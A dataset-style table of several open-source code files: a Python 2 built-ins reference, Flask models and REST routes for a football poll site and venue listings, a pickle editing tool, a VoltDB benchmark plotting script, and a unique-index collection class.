repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---|
madoodia/codeLab | python/Built-in_Functions.py | 1 | 15493 | ######################################### Built-in Functions #########################################
abs(x) # Return the absolute value of a number
# .........................................
all(iterable) # Return True if all elements of the iterable are true
# equivalent to:
def all(iterable):
for element in iterable:
if not element:
return False
return True
# .........................................
any(iterable) # Return True if any element of the iterable is true
def any(iterable):
for element in iterable:
if element:
return True
return False
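# For example (illustrative values):
all([1, 2, 3]) # Return True
any([0, '', None]) # Return False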
# .........................................
basestring() # This abstract type is the superclass for str and unicode
obj = 'hello'
isinstance(obj, basestring) # Return True
# .........................................
bin(x) # Convert an integer number to a binary string
# .........................................
bool([x]) # Convert a value to a Boolean, using the standard truth testing procedure
# .........................................
bytearray([source[, encoding[, errors]]]) # Return a new array of bytes
# .........................................
callable(object) # Return True if the object argument appears callable, False if not
def test():
pass
callable(test) # Return True
class A:
pass
a = A()
callable(A) # Return True
callable(a) # Return False
class B:
def __call__(self):
pass
b = B()
callable(B) # Return True
callable(b) # Return True
# .........................................
chr(i) # Return a string of one character whose ASCII code is the integer i
# .........................................
classmethod(function) # Return a class method for function.
class C(object):
@classmethod
def f(cls, arg1, arg2, ...):
...
# The @classmethod form is a function decorator
# It can be called either on the class (such as C.f()) or on an instance (such as C().f()).
# The instance is ignored except for its class. If a class method is called for a derived class, the derived class object is passed as the implied first argument.
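# A minimal sketch (class names are illustrative) of the derived-class behaviour:
class Base(object):
    @classmethod
    def create(cls):
        return cls()
class Derived(Base):
    pass
isinstance(Derived.create(), Derived) # Return True: cls is Derived, not Base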
# .........................................
cmp(x, y) # Compare the two objects x and y and return an integer according to the outcome
# .........................................
compile(source, filename, mode[, flags[, dont_inherit]]) # Compile the source into a code or AST object
# .........................................
complex([real[, imag]]) # Create a complex number with the value real + imag*j or convert a string or number to a complex number
# .........................................
delattr(object, name) # This is a relative of setattr(). The arguments are an object and a string
# .........................................
dict(**kwarg)
dict(mapping, **kwarg)
dict(iterable, **kwarg) # Create a new dictionary. The dict object is the dictionary class
# .........................................
dir([object]) # Without arguments, return the list of names in the current local scope
class Shape(object):
def __dir__(self):
return ['area', 'perimeter', 'location']
s = Shape()
dir(s) # ['area', 'perimeter', 'location']
# .........................................
divmod(a, b) # Take two (non complex) numbers as arguments and return a pair of numbers consisting of their quotient and remainder when using long division
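# For example:
divmod(17, 5) # Return (3, 2) because 17 == 5*3 + 2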
# .........................................
enumerate(sequence, start=0) # Return an enumerate object. sequence must be a sequence, an iterator, or some other object which supports iteration
seasons = ['Spring', 'Summer', 'Fall', 'Winter']
list(enumerate(seasons)) # [(0, 'Spring'), (1, 'Summer'), (2, 'Fall'), (3, 'Winter')]
list(enumerate(seasons, start=1)) # [(1, 'Spring'), (2, 'Summer'), (3, 'Fall'), (4, 'Winter')]
# Equivalent to:
def enumerate(sequence, start=0):
n = start
for elem in sequence:
yield n, elem
n += 1
# .........................................
eval(expression[, globals[, locals]]) # The arguments are a Unicode or Latin-1 encoded string and optional globals and locals. If provided, globals must be a dictionary. If provided, locals can be any mapping object.
# .........................................
execfile(filename[, globals[, locals]]) # This function is similar to the exec statement, but parses a file instead of a string
# .........................................
file(name[, mode[, buffering]]) # Constructor function for the file type, described further in section File Objects
isinstance(f, file)
# .........................................
filter(function, iterable) # Construct a list from those elements of iterable for which function returns true
# Note that filter(function, iterable) is equivalent to [item for item in iterable if function(item)]
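# For example (illustrative values):
filter(lambda x: x % 2, range(10)) # Return [1, 3, 5, 7, 9] (a list in Python 2)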
# .........................................
float([x]) # Convert a string or a number to floating point
# .........................................
format(value[, format_spec]) # Convert a value to a “formatted” representation, as controlled by format_spec
# .........................................
frozenset([iterable]) # Return a new frozenset object, optionally with elements taken from iterable
# .........................................
getattr(object, name[, default]) # Return the value of the named attribute of object
# .........................................
globals() # Return a dictionary representing the current global symbol table
# .........................................
hasattr(object, name) # The arguments are an object and a string
# .........................................
hash(object) # Return the hash value of the object (if it has one). Hash values are integers
# .........................................
help([object]) # Invoke the built-in help system
# .........................................
hex(x) # Convert an integer number (of any size) to a hexadecimal string
# .........................................
id(object) # Return the “identity” of an object
# .........................................
input([prompt]) # Equivalent to eval(raw_input(prompt)).
# .........................................
int(x=0)
int(x, base=10) # Convert a number or string x to an integer, or return 0 if no arguments are given
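# For example (illustrative values):
int('ff', 16) # Return 255
int('0b101', 0) # Return 5 (base 0 interprets the string like a literal)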
# .........................................
isinstance(object, classinfo) # Return true if the object argument is an instance of the classinfo argument
# .........................................
issubclass(class, classinfo) # Return true if class is a subclass (direct, indirect or virtual) of classinfo
# .........................................
iter(o[, sentinel]) # Return an iterator object
with open('mydata.txt') as fp:
for line in iter(fp.readline, ''):
process_line(line)
# .........................................
len(s) # Return the length (the number of items) of an object
# .........................................
list([iterable]) # Return a list whose items are the same and in the same order as iterable‘s items
# .........................................
locals() # Update and return a dictionary representing the current local symbol table
# .........................................
long(x=0)
long(x, base=10) # Convert a string or number to a long integer.
# .........................................
map(function, iterable, ...) # Apply function to every item of iterable and return a list of the results
def adder(a, b):
return a + b
numbers1 = [2, 4, 6, 8, 1, 10, 8, 9]
numbers2 = [4, 6, 8, 1, 10, 8, 9, 1]
mapper = map(adder, numbers1, numbers2) # Result: [6, 10, 14, 9, 11, 18, 17, 10] #
# .........................................
max(iterable[, key])
max(arg1, arg2, *args[, key]) # Return the largest item in an iterable or the largest of two or more arguments.
# .........................................
memoryview(obj) # Return a “memory view” object created from the given argument
# .........................................
min(iterable[, key])
min(arg1, arg2, *args[, key]) # Return the smallest item in an iterable or the smallest of two or more arguments.
# .........................................
next(iterator[, default]) # Retrieve the next item from the iterator by calling its next() method
# .........................................
object() # Return a new featureless object
# .........................................
oct(x) # Convert an integer number (of any size) to an octal string
# .........................................
open(name[, mode[, buffering]]) # Open a file, returning an object of the file type described in section File Objects. If the file cannot be opened, IOError is raised
# .........................................
ord(c) # Given a string of length one, return an integer representing the Unicode code point of the character when the argument is a unicode object
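# For example:
ord('a') # Return 97, the inverse of chr(97)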
# .........................................
pow(x, y[, z]) # Return x to the power y # pow(x, y) is equivalent to using the power operator: x**y
# .........................................
print(*objects, sep=' ', end='\n', file=sys.stdout) # Print objects to the stream, separated by sep and followed by end (a function, not a statement)
# In Python 2, print is a statement. To disable the statement and use the print() function, use this future statement at the top of your module:
from __future__ import print_function
# .........................................
property([fget[, fset[, fdel[, doc]]]]) # Return a property attribute for new-style classes (classes that derive from object).
class C(object):
def __init__(self):
self._x = None
def getx(self):
return self._x
def setx(self, value):
self._x = value
def delx(self):
del self._x
x = property(getx, setx, delx, "I'm the 'x' property.")
# If then c is an instance of C, c.x will invoke the getter, c.x = value will invoke the setter and del c.x the deleter.
class Parrot(object):
def __init__(self):
self._voltage = 100000
@property
def voltage(self):
"""Get the current voltage."""
return self._voltage
# turns the voltage() method into a “getter” for a read-only attribute with the same name
class C(object):
def __init__(self):
self._x = None
@property
def x(self):
"""I'm the 'x' property."""
return self._x
@x.setter
def x(self, value):
self._x = value
@x.deleter
def x(self):
del self._x
# .........................................
range(stop)
range(start, stop[, step]) # This is a versatile function to create lists containing arithmetic progressions
range(10)
range(1, 11)
range(0, 30, 5)
range(0, 10, 3)
range(0, -10, -1)
range(0)
range(1, 0)
# .........................................
raw_input([prompt]) # If the prompt argument is present, it is written to standard output without a trailing newline
s = raw_input('--> ')
# -->
# .........................................
reduce(function, iterable[, initializer]) # Apply function of two arguments cumulatively to the items of iterable, from left to right, so as to reduce the iterable to a single value
def reduce(function, iterable, initializer=None):
it = iter(iterable)
if initializer is None:
try:
initializer = next(it)
except StopIteration:
raise TypeError('reduce() of empty sequence with no initial value')
accum_value = initializer
for x in it:
accum_value = function(accum_value, x)
return accum_value
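# For example (illustrative values):
reduce(lambda accum, x: accum + x, [1, 2, 3, 4, 5]) # Return 15
reduce(lambda accum, x: accum + x, [], 10) # Return 10 (initializer used for an empty iterable)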
# .........................................
reload(module) # Reload a previously imported module
# .........................................
repr(object) # Return a string containing a printable representation of an object. This is the same value yielded by conversions
# A class can control what this function returns for its instances by defining a __repr__() method.
# .........................................
reversed(seq) # Return a reverse iterator.
# .........................................
round(number[, ndigits]) # Return the floating point value number rounded to ndigits digits after the decimal point
# .........................................
set([iterable]) # Return a new set object, optionally with elements taken from iterable
# .........................................
setattr(object, name, value) # This is the counterpart of getattr(). The arguments are an object, a string and an arbitrary value
# For example, setattr(x, 'foobar', 123) is equivalent to x.foobar = 123.
# .........................................
slice(stop)
slice(start, stop[, step]) # Return a slice object representing the set of indices specified by range(start, stop, step)
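# For example (illustrative values):
items = [0, 1, 2, 3, 4, 5]
items[slice(1, 5, 2)] # Return [1, 3], the same as items[1:5:2]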
# .........................................
sorted(iterable[, cmp[, key[, reverse]]]) # Return a new sorted list from the items in iterable.
sorted(['b', 'A', 'c'], cmp=lambda x, y: cmp(x.lower(), y.lower())) # Case-insensitive sort: ['A', 'b', 'c']
# .........................................
staticmethod(function) # Return a static method for function.
class C(object):
@staticmethod
def f(arg1, arg2, ...):
...
# It can be called either on the class (such as C.f()) or on an instance (such as C().f()).
# .........................................
str(object='') # Return a string containing a nicely printable representation of an object.
# .........................................
sum(iterable[, start]) # Sums start and the items of an iterable from left to right and returns the total
# .........................................
super(type[, object-or-type]) # Return a proxy object that delegates method calls to a parent or sibling class of type
# Note: super() only works for new-style classes.
class C(B):
def method(self, arg):
super(C, self).method(arg)
# .........................................
tuple([iterable]) # Return a tuple whose items are the same and in the same order as iterable‘s items
# .........................................
type(object) # With one argument, return the type of an object. The return value is a type object
type(name, bases, dict) # With three arguments, return a new type object # This is essentially a dynamic form of the class statement.
class X(object):
a = 1
X = type('X', (object,), dict(a=1))
# .........................................
unichr(i) # Return the Unicode string of one character whose Unicode code is the integer i
# .........................................
unicode(object='')
unicode(object[, encoding[, errors]]) # Return the Unicode string version of object
# .........................................
vars([object]) # Return the __dict__ attribute for a module, class, instance, or any other object with a __dict__ attribute.
# Without an argument, vars() acts like locals().
# .........................................
xrange(stop)
xrange(start, stop[, step]) # This function is very similar to range(), but returns an xrange object instead of a list
# .........................................
zip([iterable, ...]) # This function returns a list of tuples, where the i-th tuple contains the i-th element from each of the argument sequences or iterables
# zip() is similar to map() with an initial argument of None
x = [1, 2, 3]
y = [4, 5, 6]
zipped = zip(x, y)
zipped # [(1, 4), (2, 5), (3, 6)]
x2, y2 = zip(*zipped)
x == list(x2) and y == list(y2) # True
# .........................................
__import__(name[, globals[, locals[, fromlist[, level]]]])
# Note: This is an advanced function that is not needed in everyday Python programming
# This function is invoked by the import statement
# .........................................
# .........................................
# .........................................
| mit | 4,427,158,441,983,250,000 | 46.904025 | 217 | 0.545208 | false |
pmrowla/goonbcs | goonbcs/models.py | 1 | 3450 | # Copyright (c) 2013 Peter Rowlands
from __future__ import absolute_import
from flask.ext.security import UserMixin, RoleMixin
from . import db
class Conference(db.Model):
"""A college football conference"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), unique=True)
subdivision_id = db.Column(db.Integer, db.ForeignKey('subdivision.id'))
teams = db.relationship('Team', backref='conference', lazy='dynamic')
divisions = db.relationship('Division', backref='conference',
lazy='dynamic')
class Division(db.Model):
"""A conference division (i.e. the SEC East)"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), unique=True)
conference_id = db.Column(db.Integer, db.ForeignKey('conference.id'))
teams = db.relationship('Team', backref='division', lazy='dynamic')
class Poll(db.Model):
"""A single user's poll for a single week"""
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
week_id = db.Column(db.Integer, db.ForeignKey('week.id'))
moon_poll = db.Column(db.Boolean, default=False)
votes = db.relationship('Vote', backref='poll', lazy='dynamic')
class Season(db.Model):
id = db.Column(db.Integer, primary_key=True)
year = db.Column(db.Integer, unique=True)
weeks = db.relationship('Week', backref='season', lazy='dynamic')
class Subdivision(db.Model):
"""A college football subdivision (i.e. FBS)"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255))
conferences = db.relationship('Conference', backref='subdivision',
lazy='dynamic')
class Team(db.Model):
"""A college football team"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255))
school = db.Column(db.String(255), unique=True)
conference_id = db.Column(db.Integer, db.ForeignKey('conference.id'))
division_id = db.Column(db.Integer, db.ForeignKey('division.id'))
class Vote(db.Model):
id = db.Column(db.Integer, primary_key=True)
poll_id = db.Column(db.Integer, db.ForeignKey('poll.id'))
team_id = db.Column(db.Integer, db.ForeignKey('team.id'))
rank = db.Column(db.Integer)
db.UniqueConstraint('poll_id', 'team_id', name='uidx_poll_team')
class Week(db.Model):
id = db.Column(db.Integer, primary_key=True)
num = db.Column(db.Integer)
season_id = db.Column(db.Integer, db.ForeignKey('season.id'))
#######################
# Flask-security models
#######################
roles_users = db.Table(
'roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(255), unique=True)
password = db.Column(db.String(255))
active = db.Column(db.Boolean())
confirmed_at = db.Column(db.DateTime())
roles = db.relationship('Role', secondary=roles_users,
backref=db.backref('users', lazy='dynamic'))
polls = db.relationship('Poll', backref='user', lazy='dynamic')
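# Hypothetical usage sketch (not part of the original module); it assumes an
# application context and that the tables were created with db.create_all().
def _example_create_poll(user, season):
    """Illustrate how Week, Poll and Vote relate to each other."""
    week = Week(num=1, season_id=season.id)
    db.session.add(week)
    db.session.flush()  # assign week.id before it is referenced below
    poll = Poll(user_id=user.id, week_id=week.id)
    db.session.add(poll)
    db.session.commit()
    return poll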
| mit | -7,676,578,578,878,434,000 | 33.848485 | 75 | 0.648406 | false |
charany1/googlecl | src/debug_util.py | 2 | 2144 | # Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities that should not be distributed with source."""
__author__ = '[email protected] (Tom Miller)'
import atom
import inspect
dull_types = [str, unicode, dict, list, type(None)]
def walk_attributes(myobject, object_name, tabitem='=', step=True, tablevel=0):
"""Walk through attributes of an instance.
Just flat out prints varying values of dir() for instances and their
attributes.
Args:
myobject: instance to walk through
object_name: Name of the instance being walked through
tabitem: String to show depth into myobject. Set to '' to disable.
step: bool Use raw_input('') after printing each attribute
tablevel: Depth into myobject (starts at 0)
Returns:
Nothing; the attribute tree is only printed.
"""
print tabitem*tablevel + 'Object: ' + object_name
print tabitem*tablevel + 'Type: ' + str(type(myobject))
attr_list = [attr for attr in dir(myobject)
if not attr.startswith('_') and
not inspect.ismethod(getattr(myobject, attr))]
print tabitem*tablevel + 'Attributes: '
print tabitem*tablevel + str(attr_list)
dull_attr = [attr for attr in attr_list
if type(getattr(myobject, attr)) in dull_types]
if dull_attr:
print tabitem*tablevel + '(basic attributes: ' + str(dull_attr) + ')'
loopable_attr = [attr for attr in attr_list
if not type(getattr(myobject, attr)) in dull_types]
for attr_name in loopable_attr:
new_object = getattr(myobject, attr_name)
if step:
raw_input('')
walk_attributes(new_object, attr_name, tablevel=tablevel+1)
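# Hypothetical usage sketch (not part of the original module): any instance
# whose attributes are not all basic types can be walked, for example:
if __name__ == '__main__':
    class _Inner(object):
        def __init__(self):
            self.value = 'demo'
    class _Outer(object):
        def __init__(self):
            self.name = 'example'
            self.inner = _Inner()
    walk_attributes(_Outer(), 'outer', step=False)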
| mit | 1,641,560,307,784,319,000 | 34.733333 | 79 | 0.695429 | false |
heromod/migrid | mig/edpickle.py | 1 | 2501 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# edpickle - a simple pickled object editor.
# Copyright (C) 2009 Jonas Bardino
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Edit pickled objects on disk"""
import os
import sys
from shared.serial import pickle
if len(sys.argv) < 2:
print 'Usage: %s PATH' % sys.argv[0]
print 'Edit pickled object in file PATH'
sys.exit(1)
dirty = False
path = sys.argv[1]
print "opening pickle in %s" % path
pickle_fd = open(path, 'rb+')
obj = pickle.load(pickle_fd)
print "pickled object loaded as 'obj'"
while True:
command = raw_input("Enter command: ")
command = command.lower().strip()
if command in ['o', 'open']:
path = raw_input("Path to open: ")
pickle_fd = open(path, 'rb+')
obj = pickle.load(pickle_fd)
elif command in ['h', 'help']:
print "Valid commands include:"
print "(d)isplay to display the opened pickled object"
print "(e)dit to edit the opened pickled object"
print "(o)pen to open a new pickle file"
print "(c)lose to close the opened pickled object"
print "(q)uit to quit pickle editor"
elif command in ['d', 'display']:
print obj
elif command in ['e', 'edit']:
edit = raw_input("Edit command: ")
#eval(edit)
eval(compile(edit, 'command-line', 'single'))
dirty = True
elif command in ['c', 'close', 'q', 'quit']:
if dirty:
flush = raw_input("Modified object not saved - save now?: ")
if flush.lower() in ('y', 'yes'):
pickle_fd.seek(0)
pickle.dump(obj, pickle_fd)
pickle_fd.close()
obj = None
if command in ('q', 'quit'):
print "Closing"
break
else:
print "unknown command '%s'" % command
| gpl-2.0 | -489,058,328,799,537,700 | 32.346667 | 81 | 0.628149 | false |
NewAcropolis/api | app/routes/venues/rest.py | 1 | 3126 | import os
from flask import (
Blueprint,
current_app,
jsonify,
request
)
from flask_jwt_extended import jwt_required
from app.dao.venues_dao import (
dao_create_venue,
dao_get_venues,
dao_update_venue,
dao_get_venue_by_id
)
from app.errors import register_errors
from app.routes.venues.schemas import (
post_create_venue_schema,
post_create_venues_schema,
post_import_venues_schema,
post_update_venue_schema
)
from app.models import Venue
from app.schema_validation import validate
venues_blueprint = Blueprint('venues', __name__)
venue_blueprint = Blueprint('venue', __name__)
register_errors(venues_blueprint)
register_errors(venue_blueprint)
@venues_blueprint.route('/venues')
@jwt_required
def get_venues():
venues = [e.serialize() if e else None for e in dao_get_venues()]
return jsonify(venues)
@venue_blueprint.route('/venue/<uuid:venue_id>', methods=['GET'])
def get_venue_by_id(venue_id):
current_app.logger.info('get_venue: {}'.format(venue_id))
venue = dao_get_venue_by_id(venue_id)
return jsonify(venue.serialize())
@venue_blueprint.route('/venue', methods=['POST'])
def create_venue():
data = request.get_json(force=True)
validate(data, post_create_venue_schema)
venue = Venue(**data)
dao_create_venue(venue)
return jsonify(venue.serialize()), 201
@venues_blueprint.route('/venues', methods=['POST'])
@jwt_required
def create_venues():
data = request.get_json(force=True)
validate(data, post_create_venues_schema)
venues = []
for item in data:
venue = Venue.query.filter(Venue.name == item['name']).first()
if not venue:
venue = Venue(**item)
venues.append(venue)
dao_create_venue(venue)
else:
current_app.logger.info('venue already exists: {}'.format(venue.name))
return jsonify([v.serialize() for v in venues]), 201
@venues_blueprint.route('/venues/import', methods=['POST'])
@jwt_required
def import_venues():
data = request.get_json(force=True)
validate(data, post_import_venues_schema)
venues = []
for item in data:
if not item["name"]:
item["name"] = "Head branch"
venue = Venue.query.filter(Venue.old_id == item['id']).first()
if not venue:
venue = Venue(
old_id=item['id'],
name=item['name'],
address=item['address'],
directions="<div>Bus: {bus}</div><div>Train: {train}</div>".format(bus=item['bus'], train=item['tube'])
)
venues.append(venue)
dao_create_venue(venue)
else:
current_app.logger.info('venue already exists: {}'.format(venue.name))
return jsonify([v.serialize() for v in venues]), 201
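# Illustrative import payload (field names taken from the handler above; the
# values themselves are made up):
EXAMPLE_IMPORT_PAYLOAD = [
    {
        "id": "1",
        "name": "",  # an empty name falls back to "Head branch"
        "address": "1 Example Street",
        "bus": "271",
        "tube": "Highbury & Islington",
    }
]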
@venue_blueprint.route('/venue/<uuid:venue_id>', methods=['POST'])
def update_venue(venue_id):
data = request.get_json()
validate(data, post_update_venue_schema)
fetched_venue = dao_get_venue_by_id(venue_id)
dao_update_venue(venue_id, **data)
return jsonify(fetched_venue.serialize()), 200
| mit | 2,526,085,522,634,169,000 | 25.948276 | 119 | 0.636916 | false |
ifcharming/voltdb2.1 | tools/vis.py | 1 | 5697 | #!/usr/bin/env python
# This is a visualizer which pulls TPC-C benchmark results from the benchmark
# statistics server and visualizes them. Latency and throughput graphs are
# generated for single-node and multi-node (3 and 6 node) runs.
#
# Run it without any arguments to see what arguments are needed.
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))) +
os.sep + 'tests/scripts/')
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from voltdbclient import *
STATS_SERVER = 'volt2'
def COLORS(k):
return (((k ** 3) % 255) / 255.0,
((k * 100) % 255) / 255.0,
((k * k) % 255) / 255.0)
MARKERS = ['+', '*', '<', '>', '^', '_',
'D', 'H', 'd', 'h', 'o', 'p']
def get_stats(hostname, port, days):
"""Get statistics of all runs
Example return value:
{ u'VoltKV': [ { 'lat95': 21,
'lat99': 35,
'nodes': 1,
'throughput': 104805,
'date': datetime object}],
u'Voter': [ { 'lat95': 20,
'lat99': 47,
'nodes': 1,
'throughput': 66287,
'date': datetime object}]}
"""
conn = FastSerializer(hostname, port)
proc = VoltProcedure(conn, 'BestOfPeriod',
[FastSerializer.VOLTTYPE_SMALLINT])
resp = proc.call([days])
conn.close()
# keyed on app name, value is a list of runs sorted chronologically
stats = dict()
run_stat_keys = ['nodes', 'date', 'tps', 'lat95', 'lat99']
for row in resp.tables[0].tuples:
app_stats = []
if row[0] not in stats:
stats[row[0]] = app_stats
else:
app_stats = stats[row[0]]
run_stats = dict(zip(run_stat_keys, row[1:]))
app_stats.append(run_stats)
# sort each one
for app_stats in stats.itervalues():
app_stats.sort(key=lambda x: x['date'])
return stats
class Plot:
DPI = 100.0
def __init__(self, title, xlabel, ylabel, filename, w, h):
self.filename = filename
self.legends = {}
w = w == None and 800 or w
h = h == None and 300 or h
fig = plt.figure(figsize=(w / self.DPI, h / self.DPI),
dpi=self.DPI)
self.ax = fig.add_subplot(111)
self.ax.set_title(title)
plt.xticks(fontsize=10)
plt.yticks(fontsize=10)
plt.ylabel(ylabel, fontsize=8)
plt.xlabel(xlabel, fontsize=8)
fig.autofmt_xdate()
def plot(self, x, y, color, marker_shape, legend):
self.ax.plot(x, y, linestyle="-", label=str(legend),
marker=marker_shape, markerfacecolor=color, markersize=4)
def close(self):
formatter = matplotlib.dates.DateFormatter("%b %d")
self.ax.xaxis.set_major_formatter(formatter)
plt.legend(prop={'size': 10}, loc=0)
plt.savefig(self.filename, format="png", transparent=False,
bbox_inches="tight", pad_inches=0.2)
def plot(title, xlabel, ylabel, filename, nodes, width, height, data,
data_type):
plot_data = dict()
for app, runs in data.iteritems():
for v in runs:
if v['nodes'] != nodes:
continue
if app not in plot_data:
plot_data[app] = {'time': [], data_type: []}
datenum = matplotlib.dates.date2num(v['date'])
plot_data[app]['time'].append(datenum)
if data_type == 'tps':
value = v['tps']/v['nodes']
else:
value = v[data_type]
plot_data[app][data_type].append(value)
if len(plot_data) == 0:
return
i = 0
pl = Plot(title, xlabel, ylabel, filename, width, height)
sorted_data = sorted(plot_data.items(), key=lambda x: x[0])
for k, v in sorted_data:
pl.plot(v['time'], v[data_type], COLORS(i), MARKERS[i], k)
i += 3
pl.close()
def usage():
print "Usage:"
print "\t", sys.argv[0], "output_dir filename_base" \
" [width] [height]"
print
print "\t", "width in pixels"
print "\t", "height in pixels"
def main():
if len(sys.argv) < 3:
usage()
exit(-1)
if not os.path.exists(sys.argv[1]):
print sys.argv[2], "does not exist"
exit(-1)
path = os.path.join(sys.argv[1], sys.argv[2])
width = None
height = None
if len(sys.argv) >= 4:
width = int(sys.argv[3])
if len(sys.argv) >= 5:
height = int(sys.argv[4])
stats = get_stats(STATS_SERVER, 21212, 30)
# Plot single node stats for all apps
plot("Average Latency on Single Node", "Time", "Latency (ms)",
path + "-latency-single.png", 1, width, height, stats, 'lat99')
plot("Single Node Performance", "Time", "Throughput (txns/sec)",
path + "-throughput-single.png", 1, width, height, stats, 'tps')
# Plot 3 node stats for all apps
plot("Average Latency on 3 Nodes", "Time", "Latency (ms)",
path + "-latency-3.png", 3, width, height, stats, 'lat99')
plot("3 Node Performance", "Time", "Throughput (txns/sec)",
path + "-throughput-3.png", 3, width, height, stats, 'tps')
# Plot 6 node stats for all apps
plot("Average Latency on 6 Node", "Time", "Latency (ms)",
path + "-latency-6.png", 6, width, height, stats, 'lat99')
plot("6 Node Performance", "Time", "Throughput (txns/sec)",
path + "-throughput-6.png", 6, width, height, stats, 'tps')
if __name__ == "__main__":
main()
| gpl-3.0 | 7,035,395,335,418,342,000 | 30.131148 | 80 | 0.552923 | false |
klahnakoski/jx-sqlite | vendor/mo_collections/unique_index.py | 1 | 5570 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Contact: Kyle Lahnakoski ([email protected])
#
from __future__ import absolute_import, division, unicode_literals
from mo_dots import is_data, is_sequence, tuplewrap, unwrap, wrap
from mo_dots.objects import datawrap
from mo_future import PY2, iteritems, Set, Mapping, Iterable
from mo_logs import Log
from mo_logs.exceptions import suppress_exception
DEBUG = False
class UniqueIndex(Set, Mapping):
"""
DEFINE A SET OF ATTRIBUTES THAT UNIQUELY IDENTIFIES EACH OBJECT IN A list.
THIS ALLOWS set-LIKE COMPARISONS (UNION, INTERSECTION, DIFFERENCE, ETC) WHILE
STILL MAINTAINING list-LIKE FEATURES
KEYS CAN BE DOT-DELIMITED PATHS TO DEEP INNER OBJECTS
"""
def __init__(self, keys, data=None, fail_on_dup=True):
self._data = {}
self._keys = tuplewrap(keys)
self.count = 0
self.fail_on_dup = fail_on_dup
if data:
for d in data:
self.add(d)
def __getitem__(self, key):
try:
_key = value2key(self._keys, key)
if len(self._keys) == 1 or len(_key) == len(self._keys):
d = self._data.get(_key)
return wrap(d)
else:
output = wrap([
d
for d in self._data.values()
if all(wrap(d)[k] == v for k, v in _key.items())
])
return output
except Exception as e:
Log.error("something went wrong", e)
def __setitem__(self, key, value):
Log.error("Use add() to ad to an index")
# try:
# key = value2key(self._keys, key)
# d = self._data.get(key)
# if d != None:
# Log.error("key already filled")
# self._data[key] = unwrap(value)
# self.count += 1
#
# except Exception as e:
# Log.error("something went wrong", e)
def keys(self):
return self._data.keys()
def pop(self):
output = next(iter(iteritems(self._data)))[1]  # works on both PY2 and PY3 iterators
self.remove(output)
return wrap(output)
def add(self, val):
val = datawrap(val)
key = value2key(self._keys, val)
if key == None:
Log.error("Expecting key to be not None")
try:
d = self._data.get(key)
except Exception as e:
key = value2key(self._keys, val)
if d is None:
self._data[key] = unwrap(val)
self.count += 1
elif d is not val:
if self.fail_on_dup:
Log.error("{{new|json}} with key {{key|json}} already filled with {{old|json}}", key=key, new=val, old=self[val])
elif DEBUG:
Log.warning("key {{key|json}} already filled\nExisting\n{{existing|json|indent}}\nValue\n{{value|json|indent}}",
key=key,
existing=d,
value=val
)
def extend(self, values):
for v in values:
self.add(v)
def remove(self, val):
key = value2key(self._keys, datawrap(val))
if key == None:
Log.error("Expecting key to not be None")
d = self._data.get(key)
if d is None:
# ALREADY GONE
return
else:
del self._data[key]
self.count -= 1
def __contains__(self, key):
return self[key] != None
if PY2:
def __iter__(self):
return (wrap(v) for v in self._data.itervalues())
else:
def __iter__(self):
return (wrap(v) for v in self._data.values())
def __sub__(self, other):
output = UniqueIndex(self._keys, fail_on_dup=self.fail_on_dup)
for v in self:
if v not in other:
output.add(v)
return output
def __and__(self, other):
output = UniqueIndex(self._keys)
for v in self:
if v in other:
output.add(v)
return output
def __or__(self, other):
output = UniqueIndex(self._keys)
for v in self:
output.add(v)
for v in other:
with suppress_exception:
output.add(v)
return output
def __ior__(self, other):
for v in other:
with suppress_exception:
self.add(v)
return self
def __xor__(self, other):
if not isinstance(other, Iterable):
Log.error("Expecting other to be iterable")
other = UniqueIndex(keys=self._keys, data=other, fail_on_dup=False)
return (self-other) | (other-self)
def __len__(self):
if self.count == 0:
for d in self:
self.count += 1
return self.count
def subtract(self, other):
return self.__sub__(other)
def intersect(self, other):
return self.__and__(other)
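# A minimal usage sketch (illustrative data, not from the original module):
# index plain dicts by a key path and use set-like operations on them.
def _example_unique_index():
    people = UniqueIndex(keys="id", data=[
        {"id": 1, "name": "ann"},
        {"id": 2, "name": "bob"},
    ])
    others = UniqueIndex(keys="id", data=[{"id": 2, "name": "bob"}])
    assert people[1].name == "ann"    # lookup by the value of the "id" key
    assert len(people - others) == 1  # set-like difference keyed on "id"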
def value2key(keys, val):
if len(keys) == 1:
if is_data(val):
return val[keys[0]]
elif is_sequence(val):
return val[0]
else:
return val
else:
if is_data(val):
return datawrap({k: val[k] for k in keys})
elif is_sequence(val):
return datawrap(dict(zip(keys, val)))
else:
Log.error("do not know what to do here")
